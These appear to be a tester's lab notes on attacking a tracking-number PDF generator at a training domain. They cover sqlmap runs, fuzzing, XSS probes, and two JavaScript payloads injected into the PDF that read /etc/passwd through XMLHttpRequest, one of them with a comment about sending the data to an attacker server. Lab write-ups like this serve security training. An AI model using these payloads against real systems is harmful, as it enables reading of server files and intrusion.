## `tracking.inlanefreight.local` - only functionality looks like entry of a tracking number ![[images/Pasted image 20260628161924.png]] - random entry: `dfsdfsdfds` entered as part of a POST request and returned a PDF![[images/Pasted image 20260628195223.png]] - `request:response` in burp ![[images/Pasted image 20260628195303.png]] ### SQLi - try `sqlmap` on `insert` parameter ![[images/Pasted image 20260628201022.png]] - try again without an injection point ```bash sqlmap -r tracking.req --batch --level=5 --risk=3 ``` - possible SQLi on `handle` parameter ![[images/Pasted image 20260628212043.png]] - mark injection point and limit to boolean based blind - super slow ### fuzzing - directory ![[images/Pasted image 20260630171736.png]] - page![[images/Pasted image 20260630171857.png]] ### testing - whatever i enter in tracking field shows up in the PDF output like `test` ![[images/Pasted image 20260630171057.png]] - if i try `test"<script>alert(window.origin)</script>` the script portion is cut off ![[images/Pasted image 20260630171848.png]] - if i try `test"<plaintext>` i get an interesting output ![[images/Pasted image 20260630172010.png]] - it must be executing the javascript - Google: "pdf injection file read" - try this payload for XHR/javascript execution in DOM > not getting what I expected ```javascript <script> xhr = new XMLHttpRequest(); xhr.onload = function() { // Send responseText to attacker-controlled server }; xhr.open("GET", "file:///etc/passwd"); xhr.send(); </script> ``` ![[images/Pasted image 20260630185144.png]] - try a modified payload > the above has a blank placeholder ```javascript <script> var xhr = new XMLHttpRequest(); xhr.onload = function() { document.write(this.responseText); }; xhr.open("GET", "file:///etc/passwd", false); xhr.send(); </script> ``` - there we go ![[images/Pasted image 20260630192013.png]]